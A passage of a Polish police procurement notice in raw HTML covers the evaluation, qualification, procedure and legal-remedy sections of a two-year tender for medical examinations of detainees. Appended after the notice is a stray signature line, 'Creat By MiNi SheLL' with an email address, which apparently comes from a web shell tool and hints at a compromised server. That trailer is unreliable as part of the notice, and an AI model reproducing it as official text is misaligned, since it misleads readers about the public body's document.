stwierdzenia braku przeciwwskazań<br/> lub istnieniu przeciwwskazań do osadzenia w pomieszczeniu dla osób zatrzymanych oraz usługę pobrania krwi, wykonywał<br/> personel zatrudniony u Wykonawcy na podstawie stosunku pracy, umowy cywilno-prawnej lub umowy o udzielenie<br/> świadczeń zdrowotnych lub umowy zawartej w trybie, o którym mowa w ustawie o działalności leczniczej oraz umów<br/> zlecenie.<br/> 2. Wykonawca zobowiązany jest w terminie do 3 m-cy od zawarcia umowy do złożenia oświadczenia Zamawiającemu o<br/> zatrudnieniu pracowników, o których mowa w § 5 ust. 1 umowy o świadczenie usług zdrowotnych osób wykonujących<br/> czynności w związku z realizacją zamówienia oraz na żądanie Zamawiającego.<br/> 3. Zamawiający w trakcie realizacji zamówienia zastrzega sobie prawo do weryfikacji poprawności danych zawartych w<br/> oświadczeniu wymienionym w ust. 2. W tym celu ma prawo zażądać oświadczenia pracowników o sposobie zatrudnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85100000-0 - Usługi ochrony zdrowia</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O wyborze najkorzystniejszej oferty decydować będzie kryterium najniższej ceny.<br/> 2. Zgodnie z art. 247 ust. 1 ustawy Pzp Zamawiający nie określa wagi tego kryterium.<br/> 3. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert niepodlegających odrzuceniu tworząc ranking ofert od oferty z<br/> najniższą ceną do oferty z ceną najwyższą. Po stworzeniu rankingu Zamawiający uzna za najkorzystniejszą i wybierze ofertę z<br/> najniższą ceną.<br/> 4. Jeżeli Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej<br/> samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/> dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż<br/> zaoferowane w uprzednio złożonych przez nich ofertach.<br/> 5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/> 6. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta<br/> otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/> 7. W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody<br/> do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.<br/> 8. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający informuje równocześnie wszystkich wykonawców, którzy złożyli<br/> oferty o:<br/> a. wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania, jeżeli jest miejscem<br/> wykonywania działalności wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca<br/> zamieszkania, jeżeli są miejscami wykonywania działalności wykonawców, którzy złożyli oferty, a także zaoferowane ceny,<br/> b. wykonawcach, których oferty zostały odrzucone- podając uzasadnienie faktyczne i prawne.<br/> Informację o wyborze oferty najkorzystniejszej Zamawiający niezwłocznie udostępni na stronie internetowej prowadzonego<br/> postępowania https://platformazakupowa.pl/pn/kwp_wroclaw, z zastrzeżeniem art. 253 ust. 3 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp,<br/> z zastrzeżeniem art. 110 ust. 2 ustawy Pzp oraz na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/> zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r.<br/> poz. 507, z 2025 r. poz. 172)-rozdz. XIV SWZ. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W przypadku<br/> realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez Wykonawcę tych części<br/> zamówienia, których wykonanie powierzy podwykonawcom oraz podania nazw podwykonawców (załącznik nr 4 do SWZ), o ile są<br/> znane. W przypadku braku takiej informacji w ofercie, Zamawiający przyjmie, że Wykonawca zamierza wykonać zamówienie bez<br/> udziału podwykonawców.<br/> 10. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy (art. 95 ustawy Pzp).<br/> Wykonawca zobowiązany jest do zatrudnienia na podstawie stosunku pracy w rozumieniu art. 22 § 1 Kodeksu pracy, ewentualnie<br/> kontraktów o świadczenie usług zdrowotnych osób wykonujących przedmiot zamówienia na zasadach wskazanych w zapisach § 5<br/> załącznika nr 2 do SWZ– Projektowane postanowienia umowy (PPU), tj.:<br/> 1. Zamawiający wymaga, aby czynności w przedmiocie zamówienia tj. badanie lekarskie wraz z wystawieniem zaświadczenia<br/> lekarskiego osób zatrzymanych/doprowadzonych przez Policję w celu stwierdzenia braku przeciwwskazań lub istnieniu<br/> przeciwwskazań do osadzenia w pomieszczeniu dla osób zatrzymanych oraz usługę pobrania krwi, wykonywał personel zatrudniony<br/> u Wykonawcy na podstawie stosunku pracy, umowy cywilno-prawnej lub umowy o udzielenie świadczeń zdrowotnych lub umowy<br/> zawartej w trybie, o którym mowa w ustawie o działalności leczniczej oraz umów zlecenie.<br/> 2. Wykonawca zobowiązany jest w terminie do 3 m-cy od zawarcia umowy do złożenia oświadczenia Zamawiającemu o zatrudnieniu<br/> pracowników, o których mowa w § 5 ust. 1 umowy o świadczenie usług zdrowotnych osób wykonujących czynności w związku z<br/> realizacją zamówienia oraz na żądanie Zamawiającego.<br/> 3. Zamawiający w trakcie realizacji zamówienia zastrzega sobie prawo do weryfikacji poprawności danych zawartych w<br/> oświadczeniu wymienionym w ust. 2. W tym celu ma prawo zażądać oświadczenia pracowników o sposobie zatrudnienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> DOOFERTYNALEŻYDOŁĄCZYĆ:<br/> 1. Formularz ofertowy– wypełniony (w zakresie, który dotyczy Wykonawcy) i podpisany formularz ofertowy zawierający<br/> informacje określone w załączniku nr 1 do SWZ (podpisany kwalifikowanym podpisem elektronicznym lub podpisem<br/> zaufanym lub podpisem osobistym).<br/> 2. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, o którym mowa w art. 125 ustawy Pzp, aktualne<br/> na dzień składania ofert– wzór oświadczenia stanowi załącznik nr 3 do SWZ (podpisane kwalifikowanym podpisem<br/> elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/> 3. Oświadczenie o powierzeniu części zamówienia podwykonawcy– załącznik nr 4 do SWZ (podpisane kwalifikowanym<br/> podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/> 4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy to również wykonawców<br/> prowadzących działalność gospodarczą w formie spółki cywilnej), oświadczenie stanowiące załącznik nr 3 do SWZ, składa<br/> każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia w zakresie, w jakim każdy z Wykonawców<br/> wykazuje spełnianie warunków udziału w postępowaniu– brak podstaw do wykluczenia (podpisane kwalifikowanym<br/> podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/> 5. Pełnomocnictwo upoważniające do złożenia oferty- o ile ofertę składa pełnomocnik (podpisane zgodnie z informacją<br/> zawartą w ust. 5 pkt 5.2. powyżej).<br/> 6. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/> udzielenie zamówienia- dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/> (podpisane zgodnie z informacją zawartą w ust. 5 pkt 5.2. powyżej).<br/> 7. Ofertę, oświadczenia zaleca się sporządzić na drukach stanowiących załączniki do SWZ.<br/> 8. Oferta oraz oświadczenia muszą być złożone w oryginale. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2<br/> ustawy PZP, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno jednoznacznie wynikać prawo<br/> pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do<br/> reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu Wykonawcy. Dokument<br/> ten winien być podpisany przez osobę/osoby uprawnioną(-e) do jego udzielenia, tj. zgodnie z formą reprezentacji każdego z<br/> Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym). W<br/> przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i<br/> sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/> 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy to również wykonawców<br/> prowadzących działalność gospodarczą w formie spółki cywilnej), oświadczenie stanowiące załącznik nr 3 do SWZ, składa<br/> każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu– brak podstaw do wykluczenia (podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmiany umowy bez przeprowadzenia nowego postępowania, o których mowa w art. 455 ustawy<br/> Pzp.<br/> 2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty bez przeprowadzania<br/> nowego postępowania w zakresie uregulowanym w art. 455 Pzp oraz wskazanym paragrafie 8 w załączniku nr 2 do SWZ<br/>Projektowane postanowienia umowy (PPU). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej https://platformazakupowa.pl/pn/kwp_wroclaw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-14 09:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/> zamówienia będą udostępniane na stronie internetowej: https://platformazakupowa.pl/pn/kwp_wroclaw<br/> 2. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji. Informacje<br/> dotyczące postępowania:<br/> a. Zamawiający nie przewiduje prawa opcji,<br/> b. Zamawiający nie dopuszcza możliwości składania ofert wariantowych oraz w postaci katalogów elektronicznych,<br/> c. Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt. 8 ustawy Pzp,<br/> d. Zamawiający nie przewiduje, iż wybór najkorzystniejszej oferty zostanie poprzedzony aukcją elektroniczną (art. 308 ust. 1<br/> ustawy Pzp),<br/> e. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których<br/> mowa wart. 94 ustawy Pzp,<br/> f. Zamawiający nie określa wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2 ustawy Pzp,<br/> g. Postępowanie nie jest prowadzone w celu zawarcia umowy ramowej.<br/> h. Zamawiający nie przewiduje wizji lokalnej lub sprawdzenia dokumentów, o których mowa w art. 131 ust. 2 ustawy Pzp.<br/> 3. Środki ochrony prawnej przysługują Wykonawcy, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub<br/> może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp.<br/> 4. Odwołanie przysługuje na:<br/> 4.1.niezgodną z przepisami ustawy czynność Zamawiającego, podjęta w postępowaniu o udzielenie zamówienia, w tym na<br/> projektowane postanowienie umowy;<br/> 4.2.zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie<br/> ustawy.<br/> 5. Odwołanie wnosi sią do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo w formie elektronicznej albo w<br/> postaci elektronicznej opatrzone podpisem zaufanym.<br/> 6. Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby Odwoławczej, o którym mowa w<br/> art. 519 ust. 1 ustawy Pzp, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sadu. Skargę<br/> wnosi się do Sądu Okręgowego w Warszawie za pośrednictwem Prezesa Krajowej Izby Odwoławczej.<br/> 7. Szczegółowe informacje dotyczące środków ochrony prawnej określone są w Dziale IX „Środki ochrony prawnej&#34; ustawy<br/> Pzp.<br/> 8. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy zawiera rozdział XXI SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com